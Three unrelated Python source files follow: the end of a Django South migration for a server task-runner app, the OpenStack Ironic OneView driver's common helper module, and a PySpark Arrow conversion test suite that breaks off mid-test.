'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.application': {
'Meta': {'unique_together': "(('department', 'name'),)", 'object_name': 'Application'},
'department': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'applications'", 'to': u"orm['core.Department']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'core.department': {
'Meta': {'object_name': 'Department'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
u'core.environment': {
'Meta': {'unique_together': "(('application', 'name'),)", 'object_name': 'Environment'},
'application': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'environments'", 'to': u"orm['core.Application']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_production': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'core.server': {
'Meta': {'unique_together': "(('environment', 'name'),)", 'object_name': 'Server'},
'environment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'servers'", 'to': u"orm['core.Environment']"}),
'host': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'roles': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'servers'", 'symmetrical': 'False', 'to': u"orm['core.ServerRole']"}),
'user': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'core.serverrole': {
'Meta': {'object_name': 'ServerRole'},
'department': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'serverroles'", 'to': u"orm['core.Department']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
u'task.execution': {
'Meta': {'object_name': 'Execution'},
'environment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'executions'", 'to': u"orm['core.Environment']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '3'}),
'task': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'executions'", 'to': u"orm['task.Task']"}),
'time': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'time_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'time_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'executions'", 'to': u"orm['account.CustomUser']"})
},
u'task.executioncommand': {
'Meta': {'object_name': 'ExecutionCommand'},
'command': ('django.db.models.fields.TextField', [], {}),
'execution': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'commands'", 'to': u"orm['task.Execution']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'roles': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['core.ServerRole']", 'symmetrical': 'False'})
},
u'task.executioncommandserver': {
'Meta': {'object_name': 'ExecutionCommandServer'},
'execution_command': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'servers'", 'to': u"orm['task.ExecutionCommand']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'output': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'return_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'server': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Server']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '3'}),
'time': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'time_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'task.executionlivelog': {
'Meta': {'object_name': 'ExecutionLiveLog'},
'data': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'event': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'execution': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'live_logs'", 'to': u"orm['task.Execution']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'task.executionparameter': {
'Meta': {'object_name': 'ExecutionParameter'},
'execution': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parameters'", 'to': u"orm['task.Execution']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'task.task': {
'Meta': {'unique_together': "(('application', 'name'),)", 'object_name': 'Task'},
'application': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tasks'", 'to': u"orm['core.Application']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'task.taskcommand': {
'Meta': {'object_name': 'TaskCommand'},
'command': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {}),
'roles': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'commands'", 'symmetrical': 'False', 'to': u"orm['core.ServerRole']"}),
'task': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'commands'", 'to': u"orm['task.Task']"})
},
u'task.taskparameter': {
'Meta': {'object_name': 'TaskParameter'},
'default_value': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'order': ('django.db.models.fields.IntegerField', [], {}),
'task': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parameters'", 'to': u"orm['task.Task']"})
}
}
complete_apps = ['task']
|
|
#
# Copyright 2015 Hewlett Packard Development Company, LP
# Copyright 2015 Universidade Federal de Campina Grande
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import importutils
from ironic.common import exception
from ironic.common.i18n import _
from ironic.common.i18n import _LE
from ironic.common.i18n import _LW
from ironic.common import states
from ironic.drivers import utils
LOG = logging.getLogger(__name__)
client = importutils.try_import('oneview_client.client')
oneview_states = importutils.try_import('oneview_client.states')
oneview_exceptions = importutils.try_import('oneview_client.exceptions')
opts = [
cfg.StrOpt('manager_url',
help=_('URL where OneView is available')),
cfg.StrOpt('username',
help=_('OneView username to be used')),
cfg.StrOpt('password',
secret=True,
help=_('OneView password to be used')),
cfg.BoolOpt('allow_insecure_connections',
default=False,
help=_('Option to allow insecure connection with OneView')),
cfg.StrOpt('tls_cacert_file',
default=None,
help=_('Path to CA certificate')),
cfg.IntOpt('max_polling_attempts',
default=12,
help=_('Max connection retries to check changes on OneView')),
]
CONF = cfg.CONF
CONF.register_opts(opts, group='oneview')
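# A minimal [oneview] section of ironic.conf matching the options above
# (all values are placeholders):
#
#   [oneview]
#   manager_url = https://oneview.example.org
#   username = administrator
#   password = secret
#   allow_insecure_connections = False
#   tls_cacert_file = /etc/ironic/oneview-cacert.pem
#   max_polling_attempts = 12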
REQUIRED_ON_DRIVER_INFO = {
'server_hardware_uri': _("Server Hardware URI. Required in driver_info."),
}
REQUIRED_ON_PROPERTIES = {
'server_hardware_type_uri': _(
"Server Hardware Type URI. Required in properties/capabilities."
),
}
# TODO(gabriel-bezerra): Move 'server_profile_template_uri' to
# REQUIRED_ON_PROPERTIES after Mitaka. See methods get_oneview_info,
# verify_node_info from this file; and test_verify_node_info_missing_spt
# and test_deprecated_spt_in_driver_info* from test_common tests.
OPTIONAL_ON_PROPERTIES = {
'enclosure_group_uri': _(
"Enclosure Group URI. Optional in properties/capabilities."),
'server_profile_template_uri': _(
"Server Profile Template URI to clone from. "
"Deprecated in driver_info. "
"Required in properties/capabilities."),
}
COMMON_PROPERTIES = {}
COMMON_PROPERTIES.update(REQUIRED_ON_DRIVER_INFO)
COMMON_PROPERTIES.update(REQUIRED_ON_PROPERTIES)
COMMON_PROPERTIES.update(OPTIONAL_ON_PROPERTIES)
def get_oneview_client():
"""Generates an instance of the OneView client.
Generates an instance of the OneView client using the imported
oneview_client library.
:returns: an instance of the OneView client
"""
oneview_client = client.Client(
manager_url=CONF.oneview.manager_url,
username=CONF.oneview.username,
password=CONF.oneview.password,
allow_insecure_connections=CONF.oneview.allow_insecure_connections,
tls_cacert_file=CONF.oneview.tls_cacert_file,
max_polling_attempts=CONF.oneview.max_polling_attempts
)
return oneview_client
def verify_node_info(node):
"""Verifies if fields and namespaces of a node are valid.
Verifies if the 'driver_info' field and the 'properties/capabilities'
namespace exist and are not empty.
:param: node: node object to be verified
:raises: InvalidParameterValue if required node capabilities and/or
driver_info are malformed or missing
:raises: MissingParameterValue if required node capabilities and/or
driver_info are missing
"""
capabilities_dict = utils.capabilities_to_dict(
node.properties.get('capabilities', '')
)
driver_info = node.driver_info
_verify_node_info('properties/capabilities', capabilities_dict,
REQUIRED_ON_PROPERTIES)
# TODO(gabriel-bezerra): Remove this after Mitaka
try:
_verify_node_info('properties/capabilities', capabilities_dict,
['server_profile_template_uri'])
except exception.MissingParameterValue:
try:
_verify_node_info('driver_info', driver_info,
['server_profile_template_uri'])
LOG.warning(
_LW("Using 'server_profile_template_uri' in driver_info is "
"now deprecated and will be ignored in future releases. "
"Node %s should have it in its properties/capabilities "
"instead."),
node.uuid
)
except exception.MissingParameterValue:
raise exception.MissingParameterValue(
_("Missing 'server_profile_template_uri' parameter value in "
"properties/capabilities")
)
# end
_verify_node_info('driver_info', driver_info,
REQUIRED_ON_DRIVER_INFO)
def get_oneview_info(node):
"""Gets OneView information from the node.
:param: node: node object to get information from
:returns: a dictionary containing:
:server_hardware_uri: the uri of the server hardware in OneView
:server_hardware_type_uri: the uri of the server hardware type in
OneView
:enclosure_group_uri: the uri of the enclosure group in OneView
:server_profile_template_uri: the uri of the server profile template in
OneView
:raises InvalidParameterValue if node capabilities are malformed
"""
capabilities_dict = utils.capabilities_to_dict(
node.properties.get('capabilities', '')
)
driver_info = node.driver_info
oneview_info = {
'server_hardware_uri':
driver_info.get('server_hardware_uri'),
'server_hardware_type_uri':
capabilities_dict.get('server_hardware_type_uri'),
'enclosure_group_uri':
capabilities_dict.get('enclosure_group_uri'),
'server_profile_template_uri':
capabilities_dict.get('server_profile_template_uri') or
driver_info.get('server_profile_template_uri'),
}
return oneview_info
def validate_oneview_resources_compatibility(task):
"""Validates if the node configuration is consistent with OneView.
This method calls python-oneviewclient functions to validate if the node
configuration is consistent with the OneView resources it represents,
including server_hardware_uri, server_hardware_type_uri,
server_profile_template_uri, enclosure_group_uri and node ports. Also
verifies if a Server Profile is applied to the Server Hardware the node
represents. If any validation fails, python-oneviewclient will raise
an appropriate OneViewException.
:param: task: a TaskManager instance containing the node to act on.
"""
node = task.node
node_ports = task.ports
try:
oneview_client = get_oneview_client()
oneview_info = get_oneview_info(node)
oneview_client.validate_node_server_hardware(
oneview_info, node.properties.get('memory_mb'),
node.properties.get('cpus')
)
oneview_client.validate_node_server_hardware_type(oneview_info)
oneview_client.check_server_profile_is_applied(oneview_info)
oneview_client.is_node_port_mac_compatible_with_server_profile(
oneview_info, node_ports
)
oneview_client.validate_node_enclosure_group(oneview_info)
oneview_client.validate_node_server_profile_template(oneview_info)
except oneview_exceptions.OneViewException as oneview_exc:
msg = (_("Error validating node resources with OneView: %s")
% oneview_exc)
LOG.error(msg)
raise exception.OneViewError(error=msg)
def translate_oneview_power_state(power_state):
"""Translates OneView's power states strings to Ironic's format.
:param: power_state: power state string to be translated
:returns: the power state translated
"""
power_states_map = {
oneview_states.ONEVIEW_POWER_ON: states.POWER_ON,
oneview_states.ONEVIEW_POWERING_OFF: states.POWER_ON,
oneview_states.ONEVIEW_POWER_OFF: states.POWER_OFF,
oneview_states.ONEVIEW_POWERING_ON: states.POWER_OFF,
oneview_states.ONEVIEW_RESETTING: states.REBOOT
}
return power_states_map.get(power_state, states.ERROR)
def _verify_node_info(node_namespace, node_info_dict, info_required):
"""Verify if info_required is present in node_namespace of the node info.
"""
missing_keys = set(info_required) - set(node_info_dict)
if missing_keys:
raise exception.MissingParameterValue(
_("Missing the keys for the following OneView data in node's "
"%(namespace)s: %(missing_keys)s.") %
{'namespace': node_namespace,
'missing_keys': ', '.join(missing_keys)
}
)
# False and 0 can still be considered as valid values
missing_values_keys = [k for k in info_required
if node_info_dict[k] in ('', None)]
if missing_values_keys:
missing_keys = ["%s:%s" % (node_namespace, k)
for k in missing_values_keys]
raise exception.MissingParameterValue(
_("Missing parameter value for: '%s'") % "', '".join(missing_keys)
)
def node_has_server_profile(func):
"""Checks if the node's Server Hardware as a Server Profile associated.
"""
def inner(*args, **kwargs):
task = args[1]
oneview_info = get_oneview_info(task.node)
oneview_client = get_oneview_client()
try:
node_has_server_profile = (
oneview_client.get_server_profile_from_hardware(oneview_info)
)
except oneview_exceptions.OneViewException as oneview_exc:
LOG.error(
_LE("Failed to get server profile from OneView appliance for"
"node %(node)s. Error: %(message)s"),
{"node": task.node.uuid, "message": oneview_exc}
)
raise exception.OneViewError(error=oneview_exc)
if not node_has_server_profile:
raise exception.OperationNotPermitted(
_("A Server Profile is not associated with node %s.") %
task.node.uuid
)
return func(*args, **kwargs)
return inner
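# Illustrative usage sketch (hypothetical class and method names): the
# decorator above expects the wrapped function to receive the TaskManager
# instance as its second positional argument, e.g.:
#
#     class OneViewPower(object):
#         @node_has_server_profile
#         def set_power_state(self, task, power_state):
#             ...
#
# so that args[1] inside inner() resolves to the task.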
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import os
import threading
import time
import unittest
import warnings
from distutils.version import LooseVersion
from pyspark import SparkContext, SparkConf
from pyspark.sql import Row, SparkSession
from pyspark.sql.functions import udf
from pyspark.sql.types import StructType, StringType, IntegerType, LongType, \
FloatType, DoubleType, DecimalType, DateType, TimestampType, BinaryType, StructField, ArrayType
from pyspark.testing.sqlutils import ReusedSQLTestCase, have_pandas, have_pyarrow, \
pandas_requirement_message, pyarrow_requirement_message
from pyspark.testing.utils import QuietTest
if have_pandas:
import pandas as pd
from pandas.util.testing import assert_frame_equal
if have_pyarrow:
import pyarrow as pa # noqa: F401
@unittest.skipIf(
not have_pandas or not have_pyarrow,
pandas_requirement_message or pyarrow_requirement_message) # type: ignore
class ArrowTests(ReusedSQLTestCase):
@classmethod
def setUpClass(cls):
from datetime import date, datetime
from decimal import Decimal
super(ArrowTests, cls).setUpClass()
cls.warnings_lock = threading.Lock()
# Synchronize default timezone between Python and Java
cls.tz_prev = os.environ.get("TZ", None) # save current tz if set
tz = "America/Los_Angeles"
os.environ["TZ"] = tz
time.tzset()
cls.spark.conf.set("spark.sql.session.timeZone", tz)
# Test fallback
cls.spark.conf.set("spark.sql.execution.arrow.enabled", "false")
assert cls.spark.conf.get("spark.sql.execution.arrow.pyspark.enabled") == "false"
cls.spark.conf.set("spark.sql.execution.arrow.enabled", "true")
assert cls.spark.conf.get("spark.sql.execution.arrow.pyspark.enabled") == "true"
cls.spark.conf.set("spark.sql.execution.arrow.fallback.enabled", "true")
assert cls.spark.conf.get("spark.sql.execution.arrow.pyspark.fallback.enabled") == "true"
cls.spark.conf.set("spark.sql.execution.arrow.fallback.enabled", "false")
assert cls.spark.conf.get("spark.sql.execution.arrow.pyspark.fallback.enabled") == "false"
        # Enable Arrow optimization in these tests.
cls.spark.conf.set("spark.sql.execution.arrow.pyspark.enabled", "true")
# Disable fallback by default to easily detect the failures.
cls.spark.conf.set("spark.sql.execution.arrow.pyspark.fallback.enabled", "false")
cls.schema = StructType([
StructField("1_str_t", StringType(), True),
StructField("2_int_t", IntegerType(), True),
StructField("3_long_t", LongType(), True),
StructField("4_float_t", FloatType(), True),
StructField("5_double_t", DoubleType(), True),
StructField("6_decimal_t", DecimalType(38, 18), True),
StructField("7_date_t", DateType(), True),
StructField("8_timestamp_t", TimestampType(), True),
StructField("9_binary_t", BinaryType(), True)])
cls.data = [(u"a", 1, 10, 0.2, 2.0, Decimal("2.0"),
date(1969, 1, 1), datetime(1969, 1, 1, 1, 1, 1), bytearray(b"a")),
(u"b", 2, 20, 0.4, 4.0, Decimal("4.0"),
date(2012, 2, 2), datetime(2012, 2, 2, 2, 2, 2), bytearray(b"bb")),
(u"c", 3, 30, 0.8, 6.0, Decimal("6.0"),
date(2100, 3, 3), datetime(2100, 3, 3, 3, 3, 3), bytearray(b"ccc")),
(u"d", 4, 40, 1.0, 8.0, Decimal("8.0"),
date(2262, 4, 12), datetime(2262, 3, 3, 3, 3, 3), bytearray(b"dddd"))]
@classmethod
def tearDownClass(cls):
del os.environ["TZ"]
if cls.tz_prev is not None:
os.environ["TZ"] = cls.tz_prev
time.tzset()
super(ArrowTests, cls).tearDownClass()
def create_pandas_data_frame(self):
import numpy as np
data_dict = {}
for j, name in enumerate(self.schema.names):
data_dict[name] = [self.data[i][j] for i in range(len(self.data))]
# need to convert these to numpy types first
data_dict["2_int_t"] = np.int32(data_dict["2_int_t"])
data_dict["4_float_t"] = np.float32(data_dict["4_float_t"])
return pd.DataFrame(data=data_dict)
def test_toPandas_fallback_enabled(self):
ts = datetime.datetime(2015, 11, 1, 0, 30)
with self.sql_conf({"spark.sql.execution.arrow.pyspark.fallback.enabled": True}):
schema = StructType([StructField("a", ArrayType(TimestampType()), True)])
df = self.spark.createDataFrame([([ts],)], schema=schema)
with QuietTest(self.sc):
with self.warnings_lock:
with warnings.catch_warnings(record=True) as warns:
# we want the warnings to appear even if this test is run from a subclass
warnings.simplefilter("always")
pdf = df.toPandas()
# Catch and check the last UserWarning.
user_warns = [
warn.message for warn in warns if isinstance(warn.message, UserWarning)]
self.assertTrue(len(user_warns) > 0)
self.assertTrue(
"Attempting non-optimization" in str(user_warns[-1]))
assert_frame_equal(pdf, pd.DataFrame({"a": [[ts]]}))
def test_toPandas_fallback_disabled(self):
schema = StructType([StructField("a", ArrayType(TimestampType()), True)])
df = self.spark.createDataFrame([(None,)], schema=schema)
with QuietTest(self.sc):
with self.warnings_lock:
with self.assertRaisesRegexp(Exception, 'Unsupported type'):
df.toPandas()
def test_null_conversion(self):
df_null = self.spark.createDataFrame([tuple([None for _ in range(len(self.data[0]))])] +
self.data)
pdf = df_null.toPandas()
null_counts = pdf.isnull().sum().tolist()
self.assertTrue(all([c == 1 for c in null_counts]))
def _toPandas_arrow_toggle(self, df):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
pdf = df.toPandas()
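        # The toPandas() above ran with Arrow disabled via sql_conf; the call
        # below uses the class-level configuration, where Arrow is enabled.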
pdf_arrow = df.toPandas()
return pdf, pdf_arrow
def test_toPandas_arrow_toggle(self):
df = self.spark.createDataFrame(self.data, schema=self.schema)
pdf, pdf_arrow = self._toPandas_arrow_toggle(df)
expected = self.create_pandas_data_frame()
assert_frame_equal(expected, pdf)
assert_frame_equal(expected, pdf_arrow)
def test_toPandas_respect_session_timezone(self):
df = self.spark.createDataFrame(self.data, schema=self.schema)
timezone = "America/Los_Angeles"
with self.sql_conf({"spark.sql.session.timeZone": timezone}):
pdf_la, pdf_arrow_la = self._toPandas_arrow_toggle(df)
assert_frame_equal(pdf_arrow_la, pdf_la)
timezone = "America/New_York"
with self.sql_conf({"spark.sql.session.timeZone": timezone}):
pdf_ny, pdf_arrow_ny = self._toPandas_arrow_toggle(df)
assert_frame_equal(pdf_arrow_ny, pdf_ny)
self.assertFalse(pdf_ny.equals(pdf_la))
from pyspark.sql.pandas.types import _check_series_convert_timestamps_local_tz
pdf_la_corrected = pdf_la.copy()
for field in self.schema:
if isinstance(field.dataType, TimestampType):
pdf_la_corrected[field.name] = _check_series_convert_timestamps_local_tz(
pdf_la_corrected[field.name], timezone)
assert_frame_equal(pdf_ny, pdf_la_corrected)
def test_pandas_round_trip(self):
pdf = self.create_pandas_data_frame()
df = self.spark.createDataFrame(self.data, schema=self.schema)
pdf_arrow = df.toPandas()
assert_frame_equal(pdf_arrow, pdf)
def test_filtered_frame(self):
df = self.spark.range(3).toDF("i")
pdf = df.filter("i < 0").toPandas()
self.assertEqual(len(pdf.columns), 1)
self.assertEqual(pdf.columns[0], "i")
self.assertTrue(pdf.empty)
def test_no_partition_frame(self):
schema = StructType([StructField("field1", StringType(), True)])
df = self.spark.createDataFrame(self.sc.emptyRDD(), schema)
pdf = df.toPandas()
self.assertEqual(len(pdf.columns), 1)
self.assertEqual(pdf.columns[0], "field1")
self.assertTrue(pdf.empty)
def test_propagates_spark_exception(self):
df = self.spark.range(3).toDF("i")
def raise_exception():
raise Exception("My error")
exception_udf = udf(raise_exception, IntegerType())
df = df.withColumn("error", exception_udf())
with QuietTest(self.sc):
with self.assertRaisesRegexp(Exception, 'My error'):
df.toPandas()
def _createDataFrame_toggle(self, pdf, schema=None):
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
df_no_arrow = self.spark.createDataFrame(pdf, schema=schema)
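        # df_no_arrow was created with Arrow disabled via sql_conf; df_arrow
        # below is created under the class-level Arrow-enabled configuration.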
df_arrow = self.spark.createDataFrame(pdf, schema=schema)
return df_no_arrow, df_arrow
def test_createDataFrame_toggle(self):
pdf = self.create_pandas_data_frame()
df_no_arrow, df_arrow = self._createDataFrame_toggle(pdf, schema=self.schema)
self.assertEquals(df_no_arrow.collect(), df_arrow.collect())
def test_createDataFrame_respect_session_timezone(self):
from datetime import timedelta
pdf = self.create_pandas_data_frame()
timezone = "America/Los_Angeles"
with self.sql_conf({"spark.sql.session.timeZone": timezone}):
df_no_arrow_la, df_arrow_la = self._createDataFrame_toggle(pdf, schema=self.schema)
result_la = df_no_arrow_la.collect()
result_arrow_la = df_arrow_la.collect()
self.assertEqual(result_la, result_arrow_la)
timezone = "America/New_York"
with self.sql_conf({"spark.sql.session.timeZone": timezone}):
df_no_arrow_ny, df_arrow_ny = self._createDataFrame_toggle(pdf, schema=self.schema)
result_ny = df_no_arrow_ny.collect()
result_arrow_ny = df_arrow_ny.collect()
self.assertEqual(result_ny, result_arrow_ny)
self.assertNotEqual(result_ny, result_la)
        # Correct result_la by adjusting for the 3-hour difference
        # between Los Angeles and New York
result_la_corrected = [Row(**{k: v - timedelta(hours=3) if k == '8_timestamp_t' else v
for k, v in row.asDict().items()})
for row in result_la]
self.assertEqual(result_ny, result_la_corrected)
def test_createDataFrame_with_schema(self):
pdf = self.create_pandas_data_frame()
df = self.spark.createDataFrame(pdf, schema=self.schema)
self.assertEquals(self.schema, df.schema)
pdf_arrow = df.toPandas()
assert_frame_equal(pdf_arrow, pdf)
def test_createDataFrame_with_incorrect_schema(self):
pdf = self.create_pandas_data_frame()
fields = list(self.schema)
fields[5], fields[6] = fields[6], fields[5] # swap decimal with date
wrong_schema = StructType(fields)
with self.sql_conf({"spark.sql.execution.pandas.convertToArrowArraySafely": False}):
with QuietTest(self.sc):
with self.assertRaisesRegexp(Exception, "[D|d]ecimal.*got.*date"):
self.spark.createDataFrame(pdf, schema=wrong_schema)
def test_createDataFrame_with_names(self):
pdf = self.create_pandas_data_frame()
new_names = list(map(str, range(len(self.schema.fieldNames()))))
# Test that schema as a list of column names gets applied
df = self.spark.createDataFrame(pdf, schema=list(new_names))
self.assertEquals(df.schema.fieldNames(), new_names)
# Test that schema as tuple of column names gets applied
df = self.spark.createDataFrame(pdf, schema=tuple(new_names))
self.assertEquals(df.schema.fieldNames(), new_names)
def test_createDataFrame_column_name_encoding(self):
pdf = pd.DataFrame({u'a': [1]})
columns = self.spark.createDataFrame(pdf).columns
self.assertTrue(isinstance(columns[0], str))
self.assertEquals(columns[0], 'a')
columns = self.spark.createDataFrame(pdf, [u'b']).columns
self.assertTrue(isinstance(columns[0], str))
self.assertEquals(columns[0], 'b')
def test_createDataFrame_with_single_data_type(self):
with QuietTest(self.sc):
with self.assertRaisesRegexp(ValueError, ".*IntegerType.*not supported.*"):
self.spark.createDataFrame(pd.DataFrame({"a": [1]}), schema="int")
def test_createDataFrame_does_not_modify_input(self):
        # Some series get converted for Spark to consume; this makes sure the input is unchanged
pdf = self.create_pandas_data_frame()
# Use a nanosecond value to make sure it is not truncated
pdf.iloc[0, 7] = pd.Timestamp(1)
        # Integers with nulls will get NaNs filled with 0 and will be cast
pdf.iloc[1, 1] = None
pdf_copy = pdf.copy(deep=True)
self.spark.createDataFrame(pdf, schema=self.schema)
self.assertTrue(pdf.equals(pdf_copy))
def test_schema_conversion_roundtrip(self):
from pyspark.sql.pandas.types import from_arrow_schema, to_arrow_schema
arrow_schema = to_arrow_schema(self.schema)
schema_rt = from_arrow_schema(arrow_schema)
self.assertEquals(self.schema, schema_rt)
def test_createDataFrame_with_array_type(self):
pdf = pd.DataFrame({"a": [[1, 2], [3, 4]], "b": [[u"x", u"y"], [u"y", u"z"]]})
df, df_arrow = self._createDataFrame_toggle(pdf)
result = df.collect()
result_arrow = df_arrow.collect()
expected = [tuple(list(e) for e in rec) for rec in pdf.to_records(index=False)]
for r in range(len(expected)):
for e in range(len(expected[r])):
self.assertTrue(expected[r][e] == result_arrow[r][e] and
result[r][e] == result_arrow[r][e])
def test_toPandas_with_array_type(self):
expected = [([1, 2], [u"x", u"y"]), ([3, 4], [u"y", u"z"])]
array_schema = StructType([StructField("a", ArrayType(IntegerType())),
StructField("b", ArrayType(StringType()))])
df = self.spark.createDataFrame(expected, schema=array_schema)
pdf, pdf_arrow = self._toPandas_arrow_toggle(df)
result = [tuple(list(e) for e in rec) for rec in pdf.to_records(index=False)]
result_arrow = [tuple(list(e) for e in rec) for rec in pdf_arrow.to_records(index=False)]
for r in range(len(expected)):
for e in range(len(expected[r])):
self.assertTrue(expected[r][e] == result_arrow[r][e] and
result[r][e] == result_arrow[r][e])
def test_createDataFrame_with_map_type(self):
map_data = [{"a": 1}, {"b": 2, "c": 3}, {}, None, {"d": None}]
pdf = pd.DataFrame({"id": [0, 1, 2, 3, 4], "m": map_data})
schema = "id long, m map<string, long>"
with self.sql_conf({"spark.sql.execution.arrow.pyspark.enabled": False}):
df = self.spark.createDataFrame(pdf, schema=schema)
if LooseVersion(pa.__version__) < LooseVersion("2.0.0"):
with QuietTest(self.sc):
with self.assertRaisesRegex(Exception, "MapType.*only.*pyarrow 2.0.0"):
